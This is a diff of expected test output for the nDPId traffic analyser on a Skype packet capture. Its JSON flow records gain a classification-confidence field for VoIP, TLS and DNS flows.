 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970695909,"flow_last_seen":1431970700948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970695909,"flow_last_seen":1431970700948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00657{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1431970637197,"flow_last_seen":1431970705557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15399,"flow_avg_l4_payload_len":202,"midstream":1,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1431970637197,"flow_last_seen":1431970705557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15399,"flow_avg_l4_payload_len":202,"midstream":1,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970634432,"flow_last_seen":1431970687929,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970634431,"flow_last_seen":1431970687929,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60688,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970661447,"flow_last_seen":1431970679053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":500,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970661447,"flow_last_seen":1431970679053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":500,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970661447,"flow_last_seen":1431970679053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":500,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970684583,"flow_last_seen":1431970693811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":391,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970684583,"flow_last_seen":1431970693811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":391,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970684583,"flow_last_seen":1431970693811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":391,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.32","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.32","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
